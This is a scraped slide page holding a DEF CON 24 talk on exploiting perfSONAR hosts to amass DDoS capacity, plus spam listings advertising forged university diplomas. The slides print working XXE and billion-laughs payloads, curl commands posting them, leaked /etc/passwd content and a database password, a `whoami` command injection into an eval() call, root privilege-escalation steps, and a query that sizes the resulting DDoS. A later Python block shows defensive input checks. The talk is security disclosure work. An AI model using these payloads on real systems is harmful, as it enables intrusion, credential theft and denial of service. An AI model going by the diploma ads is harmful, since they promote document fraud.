Remotely Compromising iOS via Wi-Fi and Escaping the SandboxRemotely Compromising iOS via Wi-Fi and Escaping the Sandbox
Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox
 
Applied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topicsApplied Machine Learning for Data exfil and other fun topics
Applied Machine Learning for Data exfil and other fun topics
 
JailBreak DIY- Fried Apple
JailBreak DIY- Fried AppleJailBreak DIY- Fried Apple
JailBreak DIY- Fried Apple
 
The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10The linux kernel hidden inside windows 10
The linux kernel hidden inside windows 10
 
Exploiting Curiosity and Context
Exploiting Curiosity and ContextExploiting Curiosity and Context
Exploiting Curiosity and Context
 
Abusing belkin home automation devices
Abusing belkin home automation devicesAbusing belkin home automation devices
Abusing belkin home automation devices
 
Greed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale BotnetsGreed for Fame Benefits Large Scale Botnets
Greed for Fame Benefits Large Scale Botnets
 
How your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacyHow your smartphone cpu breaks software level security and privacy
How your smartphone cpu breaks software level security and privacy
 
How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness How to Make People Click on a Dangerous Link Despite their Security Awareness
How to Make People Click on a Dangerous Link Despite their Security Awareness
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 
Technologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible CyberspaceTechnologies and Policies for a Defensible Cyberspace
Technologies and Policies for a Defensible Cyberspace
 

Recently uploaded

一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理一比一原版(USYD毕业证)悉尼大学毕业证如何办理
一比一原版(USYD毕业证)悉尼大学毕业证如何办理
k4ncd0z
 
HijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process HollowingHijackLoader Evolution: Interactive Process Hollowing
HijackLoader Evolution: Interactive Process Hollowing
Donato Onofri
 
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
怎么办理(umiami毕业证书)美国迈阿密大学毕业证文凭证书实拍图原版一模一样
rtunex8r
 
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
留学挂科(UofM毕业证)明尼苏达大学毕业证成绩单复刻办理
uehowe
 
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
办理毕业证(UPenn毕业证)宾夕法尼亚大学毕业证成绩单快速办理
uehowe
 
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaalmanuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
manuaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaal
wolfsoftcompanyco
 
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
成绩单ps(UST毕业证)圣托马斯大学毕业证成绩单快速办理
ysasp1
 
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
办理新西兰奥克兰大学毕业证学位证书范本原版一模一样
xjq03c34
 
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
快速办理(新加坡SMU毕业证书)新加坡管理大学毕业证文凭证书一模一样
3a0sd7z3
 
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
快速办理(Vic毕业证书)惠灵顿维多利亚大学毕业证完成信一模一样
3a0sd7z3
 
Bengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal BrandingBengaluru Dreamin' 24 - Personal Branding
Bengaluru Dreamin' 24 - Personal Branding
Tarandeep Singh
 
Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!Ready to Unlock the Power of Blockchain!
Ready to Unlock the Power of Blockchain!
Toptal Tech
 
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
办理毕业证(NYU毕业证)纽约大学毕业证成绩单官方原版办理
uehowe
 
Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?Should Repositories Participate in the Fediverse?
Should Repositories Participate in the Fediverse?
Attacking Network Infrastructure to Generate a 4 Tb/s DDoS

INTERNET2 PRODUCTS
➤ Trust Identity & Middleware
➤ InCommon Federation
➤ Shibboleth
➤ Performance & Analytics
➤ BWCTL - Bandwidth Test Controller
➤ NDT - Network Diagnostic Tool
➤ OWAMP - One-Way Ping
➤ perfSONAR - pS-Performance Toolkit
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE author [
  <!ELEMENT author (#PCDATA)>
  <!ENTITY ly "Luke Young">
]>
<presentations>
  <presentation>
    <name>Investigating the Practicality and Cost of Abusing Memory Errors</name>
    <location>DEF CON 23</location>
    <author>&ly;</author>
  </presentation>
  <presentation>
    <name>Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5</name>
    <location>DEF CON 24</location>
    <author>&ly;</author>
  </presentation>
</presentations>
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
XML EXTERNAL ENTITY PROCESSING (XXE)
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
PERFSONAR ISSUE #783 REBORN
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
      <nmwg:data>
        &xxe;
      </nmwg:data>
    </nmwg:message>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
PERFSONAR ISSUE #783 REBORN
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">
      <nmwg:data>root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
...
pulse:x:489:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
admin:x:500:505::/home/admin:/bin/bash
sudo:x:501:506::/home/sudo:/bin/bash
      </nmwg:data>
      <nmwg:metadata id="return_message">
        <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType>
      </nmwg:metadata>
      <nmwg:data metadataIdRef="return_message" id="data_return_message">
        <nmwgr:datum>Unknown messagetype: </nmwgr:datum>
      </nmwg:data>
    </nmwg:message>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
curl -X POST -d @passwd.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <soapenv:Fault>
      <faultcode>soapenv:Server.Internal</faultcode>
      <faultstring>Error parsing message: I/O error : Permission denied
I/O error : Permission denied
:1: parser error : Failure to process entity xxe
g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe;
                                                                                      ^
:1: parser error : Entity 'xxe' not defined
g:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"&gt; &lt;nmwg:data&gt; &amp;xxe;
                                                                                      ^
 at /opt/perfsonar_ps/oppd_mp/bin/oppd.pl line 760
      </faultstring>
    </soapenv:Fault>
  </soapenv:Body>
</soapenv:Envelope>
curl -X POST -d @shadow.xml http://perfSONAR:8090/
PERFSONAR ISSUE #783 REBORN
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" xmlns:nmwgr="http://ggf.org/ns/nmwg/result/2.0/" type="ErrorResponse">
      <nmwg:data>[main]
sql_db_engine = django.db.backends.postgresql_psycopg2
sql_db_name = esmond
sql_db_user = esmond
sql_db_password = 7hc4m1
tsdb_root = %(ESMOND_ROOT)s/tsdb-data
...
      </nmwg:data>
      <nmwg:metadata id="return_message">
        <nmwg:eventType>error.nmwg.action_not_supported</nmwg:eventType>
      </nmwg:metadata>
      <nmwg:data metadataIdRef="return_message" id="data_return_message">
        <nmwgr:datum>Unknown messagetype: </nmwgr:datum>
      </nmwg:data>
    </nmwg:message>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
curl -X POST -d @esmond.xml http://perfSONAR:8090/
PERFSONAR EXPLOITATION
➤ XSS and XXE abundant
➤ RCE seemed impossible
PERFSONAR - BANDWIDTHGRAPH.CGI
if ( scalar @childnodes == 1 ) {
    if ( $child->textContent =~ m/(E|e)rror/ || $child->textContent =~ m/Query returned 0 results/ ) {
        next;
    }
}
my %tsresult = ();
my $throughput = eval( $child->getAttribute("throughput") );
my $eTime = $child->getAttribute("timeValue");
my $etimestamp;
}
PERFSONAR - BANDWIDTHGRAPH.CGI
<nmwg:data id="data.16870844" metadataIdRef="metadata.7441249" xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
  <iperf:datum throughput="8.23811e+08" timeType="iso" timeValue="Tue Oct 19 15:18:29.823998065 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.0573e+08" timeType="iso" timeValue="Tue Oct 19 16:17:55.2163317044 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.29349e+08" timeType="iso" timeValue="Tue Oct 19 17:17:55.3262506549 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.24512e+08" timeType="iso" timeValue="Tue Oct 19 18:20:02.81157432 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="9.04838e+08" timeType="iso" timeValue="Tue Oct 19 19:17:56.3379084847 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.16295e+08" timeType="iso" timeValue="Tue Oct 19 22:21:00.284368039 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.32728e+08" timeType="iso" timeValue="Tue Oct 19 23:17:55.2126511324 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
  <iperf:datum throughput="8.18147e+08" timeType="iso" timeValue="Wed Oct 20 04:19:43.2927588221 UTC 2010" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
</nmwg:data>
PERFSONAR - BANDWIDTHGRAPH.CGI
my $cgi = new CGI;
my $ma_url = $cgi->param('url');
my $key = $cgi->param('key');
...
if ( !defined $ma_url ) {
    print $cgi->header;
    my $errmsg = "Missing MA_URL";
    my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" );
    $errfile->param( ERRORMSG => $errmsg );
    print $errfile->output;
    exit(1);
}
...
if ( !defined $key ) {
    ...
    if(!$key){
        print $cgi->header;
        my $errmsg = "Unable to find matching MA key for provided parameters";
        my $errfile = HTML::Template->new( filename => "$basetmpldir/bw_error.tmpl" );
        $errfile->param( ERRORMSG => $errmsg );
        print $errfile->output;
        exit(1);
    }
}
PERFSONAR - BANDWIDTHGRAPH.CGI
my $res = &getData( $ma_url, $key, $start, $end );
...
sub getData() {
    foreach my $k (@keyList){
        my $ma = new perfSONAR_PS::Client::MA( { instance => $ma_url } );
        ...
        my $result = $ma->setupDataRequest( ... );
        ...
        my @childnodes = $root->findnodes("./*[local-name()='datum']");
        ...
        foreach my $child (@childnodes) {
            ...
            my $throughput = eval( $child->getAttribute("throughput") );
            ...
        }
    }
}
PERFSONAR - BANDWIDTHGRAPH.CGI
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/" id="message.3046685" type="EchoRequest">
      <nmwg:metadata id="metadata.12999789">
        <nmwg:eventType>http://schemas.perfsonar.net/tools/admin/echo/2.0</nmwg:eventType>
      </nmwg:metadata>
      <nmwg:data metadataIdRef="metadata.12999789" id="data.1942969"></nmwg:data>
    </nmwg:message>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
PERFSONAR - BANDWIDTHGRAPH.CGI
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/">
      <nmwg:metadata id="metadata.1337">
        <nmwg:eventType>success.test</nmwg:eventType>
      </nmwg:metadata>
      <nmwg:data metadataIdRef="metadata.1337">
        <iperf:datum throughput="`whoami`" timeValue="1 1 1 1:1:1 1" xmlns:iperf="http://ggf.org/ns/nmwg/tools/iperf/2.0/"/>
      </nmwg:data>
    </nmwg:message>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
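The following is an added example, not code from the talk or from the perfSONAR project: it shows the two checks a defender would want in a consumer of these nmwg messages, refusing any DTD entity declaration before it is expanded (the XXE and billion-laughs payloads under XML EXTERNAL ENTITY PROCESSING and PERFSONAR ISSUE #783 REBORN) and validating the iperf:datum throughput attribute as a number instead of handing it to eval() as bandwidthGraph.cgi did. The sample messages are constructed, and the is_safe_message helper is an assumption of this example.

```python
import re
import xml.etree.ElementTree as ET
import xml.parsers.expat

IPERF_NS = "http://ggf.org/ns/nmwg/tools/iperf/2.0/"  # namespace of iperf:datum
# A throughput is accepted only as a plain decimal or scientific float.
NUMBER_RE = re.compile(r"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")

class UnsafeMessage(ValueError):
    """Raised for a DTD entity declaration or a non-numeric datum."""

def reject_entity_declarations(xml_text):
    """First pass with expat: every <!ENTITY ...> is reported to the handler
    before expansion, so XXE and billion-laughs DTDs are refused up front."""
    parser = xml.parsers.expat.ParserCreate()
    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeMessage("entity declaration %r rejected" % name)
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = lambda *args: 0  # never fetch a SYSTEM id
    parser.Parse(xml_text, True)

def extract_throughputs(xml_text):
    """Return each iperf:datum throughput as a float; the attribute is checked
    against NUMBER_RE rather than evaluated as code."""
    reject_entity_declarations(xml_text)
    root = ET.fromstring(xml_text)
    values = []
    for datum in root.iter("{%s}datum" % IPERF_NS):
        raw = datum.get("throughput", "")
        if not NUMBER_RE.match(raw):
            raise UnsafeMessage("non-numeric throughput %r" % raw)
        values.append(float(raw))
    return values

def is_safe_message(xml_text):
    """True only if the message parses without entities and carries numeric data."""
    try:
        extract_throughputs(xml_text)
        return True
    except (UnsafeMessage, ET.ParseError, xml.parsers.expat.ExpatError):
        return False

# Constructed sample messages (not captured from a real perfSONAR host).
GOOD_MESSAGE = ('<nmwg:message xmlns:nmwg="http://ggf.org/ns/nmwg/base/2.0/"><nmwg:data>'
                '<iperf:datum throughput="8.23811e+08" xmlns:iperf="%s"/>'
                '<iperf:datum throughput="8.0573e+08" xmlns:iperf="%s"/>'
                '</nmwg:data></nmwg:message>' % (IPERF_NS, IPERF_NS))
XXE_MESSAGE = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
RCE_MESSAGE = GOOD_MESSAGE.replace('throughput="8.0573e+08"', 'throughput="`whoami`"')
```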
PERFSONAR - CONFIGMANAGER
➤ /etc/hosts
➤ /etc/ntp.conf
➤ /etc/ntp/step-tickers
➤ /etc/bwctld/bwctld.conf
➤ /etc/bwctld/bwctld.limits
➤ /etc/owampd/owampd.limits
➤ /usr/ndt/tcpbw100.html
➤ /opt/perfsonar_ps/ls_registration_daemon/etc/ls_registration_daemon.conf
➤ /opt/perfsonar_ps/regular_testing/etc/regular_testing.conf
➤ /opt/perfsonar_ps/toolkit/etc/administrative_info
➤ /opt/perfsonar_ps/toolkit/etc/enabled_services
➤ /opt/perfsonar_ps/toolkit/etc/external_addresses
➤ /opt/perfsonar_ps/toolkit/etc/ntp_known_servers
PERFSONAR - CONFIGMANAGER
➤ Backup original bwctld.conf
➤ Use ConfigManager to stop bwctld
➤ Write executable posthook.pl
➤ Use ConfigManager to write new bwctld.conf
➤ Use ConfigManager to start bwctld
➤ Trigger a bwctl session, triggering posthook.pl as root
➤ Use ConfigManager to stop bwctld
➤ Remove posthook.pl
➤ Restore original bwctld.conf
➤ Use ConfigManager to start bwctld back to original configuration
PERFSONAR NETWORK SUMMARY
➤ 970 Publicly routable nodes
➤ 12.51 TB of RAM
➤ 29.85 THz CPU Cycles
➤ Average Node:
➤ 13 GB of RAM
➤ 12 Cores at 2.6 GHz
PERFSONAR THEORETICAL NETWORK SPEED
5.719 Tb/s
CALCULATING ACTUAL NETWORK SPEED
➤ Enumerate all perfSONAR instances and their maximum interface speed
➤ Calculate instance location from GeoIP
➤ Match 5 closest instances of same or faster interface speed
CALCULATING ACTUAL NETWORK SPEED
➤ index=ps sourcetype=ps-summary
  | dedup ls_client_uuid
  | rename external_address.address as address, external_address.speed as speed, services{}.enabled as enabled
  | where mvindex(enabled,0)="1"
  | fillnull value=10000000000 speed
  | iplocation address
  | map maxsearches=100000 search="search index=ps sourcetype=ps-summary
      | dedup ls_client_uuid
      | rename services{}.enabled as peer_enabled
      | eval peer_enabled = mvindex(peer_enabled,0)
      | where peer_enabled="1"
      | eval address=$address$, speed=$speed$
      | rename external_address.address as peer_address, external_address.speed as peer_speed
      | fillnull value=10000000000 peer_speed
      | where peer_address!=address AND peer_speed >= speed
      | eval lat=$lat$, lon=$lon$
      | iplocation prefix=peer_ peer_address
      | eval distance=sqrt(pow(lat-peer_lat,2)+pow(lon-peer_lon,2))
      | where distance!=0
      | sort distance
      | head 5
      | fields address, speed, peer_address, peer_speed, distance"
  | table address, speed, peer_address, peer_speed, distance
CALCULATING ACTUAL NETWORK SPEED
➤ Never run 2 tests with the same instance at the same time
➤ Never run more than 10 tests at the same time
➤ Never test a host that doesn't have bwctl enabled
PERFSONAR ACTUAL NETWORK SPEED
3.703 Tb/s
CONCLUSION
➤ oppd (XXE) - unresolved
➤ bandwidthGraph.cgi (RCE) - fixed by perfSONAR 3.5.1 on March 3rd
➤ ConfigDaemon (PrivEsc) - unresolved
CONCLUSION
➤ GitHub: http://www.github.com/bored-engineer
➤ Email: me@bored.engineer
➤ LinkedIn: https://www.linkedin.com/in/bored-engineer
➤ Twitter: @TheBoredEng